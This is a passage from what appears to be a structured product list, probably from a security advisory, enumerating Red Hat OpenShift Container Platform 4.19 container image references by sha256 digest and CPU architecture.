"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:898fde5963557880b3823bd46af8088248cb445cbe8909c8bbfe47e7887540a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:8ed88897f9c69a7018486d849e324d21da24df8f2597618f4e3ec9a5a9b7c211_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:ce9de5a46ede5b462a95a069d3e69e0944b51d0b65e8b557a5e41819978c502e_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-network-metrics-daemon-rhel9@sha256:e605c6228fb3a17648d4bf831c60b34032c000e625f232c2c841652b12ec56b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:446e5456c05c7d2bec67d89593839412d80fb3ed2d3187999ad35cbe4bef6254_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:ca13dacb50b72ce0a37639571e4725f447d773735f4ddd1eb787842184c6d16c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f4c5709aaed3be1c656067ba0a6f6a9c6612ac5044a9f659762cbfd8ac999f2f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-networking-console-plugin-rhel9@sha256:f716b95f7c71d7c19652b152f542d31dc4afe25e49f303853a764aef57036215_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-cloud-controller-manager-rhel9@sha256:79ccd40e05ae0921c4d5b53ecbbd84872bd5321c5af2db3e2336aa6a133d147c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-nutanix-machine-controllers-rhel9@sha256:ea20d945814432b378647144a1bd5b9d86817d313afc11344780b85b3c3bc978_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:0a47f4c9013d8952c47ee25b3bd65fcb7f456cfb22d3604427eae1ea640a3b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:8471d6d7d895f46fb2a5d47003f30b9912bc364b7c9e968f3f956a30892039c3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:aa4e3baa62b954b5b608720705840545d15fd13a10f9f7559f388a0baa23b43b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-apiserver-rhel9@sha256:bb5b559822cbc33606bf85ce2f250ca390d32abdd72a3366264178cf96d9350f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:1f2e291faed6c919022e0aeb99da4937c21c9ea21f1d32f2012a1a9d090b35f1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:43691966b7a2bccfce36dabe72471924a9c5b36bac8e92dd34607d1216572064_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:c16d64bc9641e60f11486d22e0d1625024f11cc66a2ee4ea5bc28f3658e8cb72_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-proxy-rhel9@sha256:d98ec7aa0c573d9a727fd30afb7844e7b70e380a8e2f81f57c58702858a73bbf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:46535766ac9cf5891d27f9ff7e0f237e6da936ec70eda335feb0daa7792be0a6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7943825a48e79ead36af88aaf9d6f391ffe9e7a0f975cad8022cb013e87bbc3d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:7a634a90a2588298e8ae069655793200319b64fcd8f597a28ccdcfd7cbccfec3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-oauth-server-rhel9@sha256:8325d7f01b4c91298b30264af086d7478d85d04f4427469c6bcfd9cd4e2ca8da_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:23a38593785b8a77c82fe981e8218363e58b55273e8d66b0dde4503627f891ba_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:3414c5c5e88fc6e70cc1dc9db2f61bbd8200440983b0f7f538a323432e7ba6ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:cc214669704ff3c6bb09cecaf60a1f48f1110faa5db2fa08ecf43728318d315c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-catalogd-rhel9@sha256:d735e0c9269659f018b79543fb8bb04999139219635252d624516c48d32f87a1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:5e97a541ac477608c7ab93fdabd1ce26464278d04dbb60a41e9444648926b5ed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:66dd0ff7ebdf89393607ed43af70c5b19d7d062c4715dedde645cf7cf00042c6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:6d0d678b8e234b026b11de75091fe5869edf76484325380a0bc2ea40d316828f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-olm-operator-controller-rhel9@sha256:72fc95856ec7db8a502bf2b09972d63f50671593a26366a9aa56d6153459fb79_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:35588ff05b4c23c28da38abaed98e46da42e24899bc6fe6b40508a77706a4a6b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:46bfd97dc7a9ceec42f309d5bc112e6eb8212b96278d70b5e67d4fd2f40170b7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:5015658d5bee0ff943bc69525816e23d34ca35ec3a818cf0130d58c8baea98b6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-apiserver-rhel9@sha256:560aafed0881129dc2e59d0639cf2924f25ecfc9b4104b9a9700c0ece0693a76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:2497f36ad41776147768069c63bab22f639770328273f69ef16473d41ce32278_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:269715c1fc118c5a352bb9a221e648f2fa24caabc0ae874d906e2947837b6a9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5a81fa31d2a53a7942e433df47983d0a9b17a3be01dc73802698a26c5a54557b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-controller-manager-rhel9@sha256:5f6089d286cfa67bcf24b6860c840e503fe431f8df8557324d9fae2725ee6f0d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:82412b7cf5683fb7a70749370015ea212339356d0443143e70ba439aba6d0b0f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:8e9affb2924d2c993f50e4baa132d3e3ddb4f1012154a80d9bf9114bddb10e49_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:9bb0d3806c90ff845c4dbe11678a15f2816a902e9fde4df463f3e85febdcfd8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openshift-state-metrics-rhel9@sha256:d14dd6230f53078a6cf0d3b1528d0d22995add08578ab3da323a4ff92d13cc31_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:6f971e62173e3772bc6c474b3f796d93ef9f01e1d098705177f06a82f56601b9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:988ab0315395f8580b26df4a0ebc13f53d47dd4bfb4160489f1d24c3c118c795_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:a51c6200b8f5a73c29e236c1a4ff59b61b54fe200fbed5f13d54583ea7f8f51e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9-operator@sha256:fc80f86e06eb2cc0fd6de0eebe896533169eb85bdd15e54b7b6a8e8722d3cf34_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:2d02a78de1b38dd1aa1159bffade3aaba19ee6ddf8b3a8f2b4a017cb2a6ea22e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:3f3e0469a0d159c94ffc5063f08fa8af255d1e620b359264211b196cb330eb4e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:55f9b85e57f11e221edf4e30d65037caedd69a0a4d37d560d99225b992aa1cbb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cinder-csi-driver-rhel9@sha256:dbce78ed2734d0a9d61b3404fdcc6f4541b8dc5b95e4fb40b8f9157b002b2681_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:39dc4401c0fe4bdac4a4d5ff18880f92ce0cbf10e00208a564a50973ff2667b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:50613490849c11ce84b306bf77e8fd0e2d5e8e74d0db805f1dd73e7877a3d8a4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:a0fa55daf82f32ede8a24f467db6f6591c5f5810f3dfa4c5b095fe5ba8274595_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cloud-controller-manager-rhel9@sha256:d17159405d993d6f0e812b36fc09809ae821807eadd5b9f1d448f4f188bd0e73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:1de5b7823150dabafe0ca7d026012a02e03da9f95ebab9389d84f82c4fb83dc7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:b12d8b79849779424f3cffd8ff8da719904dadb5cdb018f0056f39b3ccb593f8_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:cba950803b92bd6bd4edf5f6e4c6f6f92cc899132e530d2508d142deeb9366cd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-openstack-cluster-api-controllers-rhel9@sha256:d5c61e25f1e62aab1c6a521f4184d3552fe23d82e3a080124bf8e38d4b2ba2cd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:68a9cd133540eed3257ca2d5fa6f8ef384c3f66cc3cb4a30c72228c3450bce49_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:92a4f2142815522fdeee0f26ed1841cb16c10ab93ec38512f64ce82a81a12bb6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:e80c61f3f591b4a682b352c787e1715f7d9f4f06e209ef8dc82e41b8bded9b8e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-framework-tools-rhel9@sha256:f5f04cf85a80bba86be83c2fdd946e2efe511959a0ff382620bb9f7aa25b8c71_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:920a0d0905c6decac8fa8ae599192003df5391c6672f6c6f5eec3b6d9a8e0fee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a247fbc173026dc90407f375b79904dc8d29daecacd96333fa6ef80b3186e8eb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:a97b0c4ab3e8716aadd8773aac0e95cb23aaaf6b618a2f759a1a53ecf078345f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-lifecycle-manager-rhel9@sha256:fc7191fca813048d552379742516176d723b1b1616dd53dd5ac557d117437c7a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:2848880f87cf2488a841e371c990a81b83e44e08e7e4b1599c2009f078080d85_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:5ec6c4b928751540b436763b99127acafab69b5dfc867cd4cf74871697327698_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:730d5918dbf2f364e8528b6c8036541fbbee9e81c1bd5f6985f87b4602bc4579_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-marketplace-rhel9@sha256:9fe8545ad96791b55050941f86c99eef5b8b88b927c0e1953ce3ee703b6bf525_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:233b4ee8499922834ec87e62c2d4f322062f8063c99a95010bcf817e6114af6e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:337f863c631718a87bb7c6f86491aab519c0885ab1fe4184dd33df493da56386_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:350c76802bc5210c06f8ee9ac9a4a7f2474505132c1eab2607bfab309f59e5f3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-operator-registry-rhel9@sha256:43aa5f0fe9244c1aaf3912b184ffee644522a2ff3bd3aadd53db5b90b0c93c76_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:28f0a87cf08f7f9134bbe4ca64a7bc38a8882ecb5c8c6d57d5bb8f9096cdb76b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:4a986e828ec8120aa34ff2e35fe51c1866af855ea48e21d41aaeddcb4563a5d7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:8fc1c4e8704ed03a5515293ed3b18f9cf2f72b57bf97f6f646f0c4b7dfd47d65_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-microshift-rhel9@sha256:c8a812560939b0a79d1b687f36dd5c5b71d01bea059b07e3652b35678884d330_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:515b6d09bed60aa703612507005248bbda01c940605101e93897805a7f1e4666_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:b36db241db3e48fdc932865032dbedaf9d94816523648f4345f19acba26cd7f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:e8b6d45610b94825d1f5525443529e99a5e68441a8f331e20746614a606dc475_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ovn-kubernetes-rhel9@sha256:f3405b744680f7e937609958ff100453abb5a7cff06344997be0b0a7b7fa29e3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:0df3b71023897418a185bfc7a38f4f67e0a41b6733452fefd59c9d7edbec3df6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:49afa7e1da94ce712c27df4a3e01d4748b2a493b4c61527a8a895c24e3001648_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:afbb2ca0948d8280647626e33064e6fc0d72310244cd69e338efdcc1b1ea7c8b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-pod-rhel9@sha256:e689a8391301d7ce3ba922d5fee8624e5d7f9c7a23905f78a7171d9a182d3f1c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:93ddc3e527257964b98d041a3d830c1be67f8c781f93d562c328c1dee7b37ef1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9-operator@sha256:97611bba51f02868cd922555e6c8e75d7eb4b5d8a865a69fd957084f897a5033_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:3a47a587be70333ba3719bb416fb04c176e41ce27d2c051b1210717857fd9b92_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-block-csi-driver-rhel9@sha256:d48293acc1ecfd8e08eed3f47d3c37eb9d5905642a04e12ed26434a222ed0476_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:25f2667e3ce28ce5f0326be23f78cc6eedd523d4d2cdcfee2c02565d14d16ec2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-cloud-controller-manager-rhel9@sha256:ec8e975cdae392efc948e02d0a30b98809739aff380a856ec97e0367fd1d0179_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:70ec66ac0b28bc34120378d962fdfe8a2f2411591611eaf6df7d4e62b8076a7f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-powervs-machine-controllers-rhel9@sha256:cc3b4055bc35dcc6c701bca3092202adbdbf5edefe3737167475ee2431fc30c1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:2b9e95c24afe6cdf775027984310e0388433100034ef17e8de50160370019063_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:47e0ce843654534a810ad00a3b0703d8abbf4b8f221c479bae47cceed4d944e1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:6c081df14b51b5bffaaf126426c8919de0821a460c3a7ec80abf95581b749609_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prom-label-proxy-rhel9@sha256:7f52c583cdba43b214630766d8f050b322c936307f28e1951b47d2fdecd11acb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:470582fb21bf68d82be5cb2548bb4fd55827624330297d62b246a69b831153cd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:a362b4e6bd7979c2413fe2bed3f66be4a44508bf397115caa539fa0857e26527_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:c0935ced156f72b3a6a77ff11445c038bd0555d881b73c760c7291cc7d27749b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-alertmanager-rhel9@sha256:f434571500312f9a43f76fb244efb3184388fa6c34e955228612364918c8f1c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:5fa811100ce565454ba1e243b9d0b94ca6f9f630fe159d4a7de104eb844039e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:a40105662b9188d283206418a2884182a9aff74c2cf4f700df3bd69443773d8c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:bde91bb377421a028e30bb830721f120be505c245717b5e2a3e25e5e6754bd5a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-config-reloader-rhel9@sha256:e4ca2b3866c381b5fbbf8f6be7f9a34f4dd86ef1f952624e28760ce20ca3be64_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:07c0eed66aca1eed3b7897a24d97c00cb77f592f9b6900c7fb2644b4cfae6797_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:399d1be8fdde89d24d645044e04a0f5c0c105629896692c5e856a69d1bc6b076_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:62e2f95a2e6d53f00bfed8b866c40378bfb1219b72ba6b4e9478d4753fcfa623_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
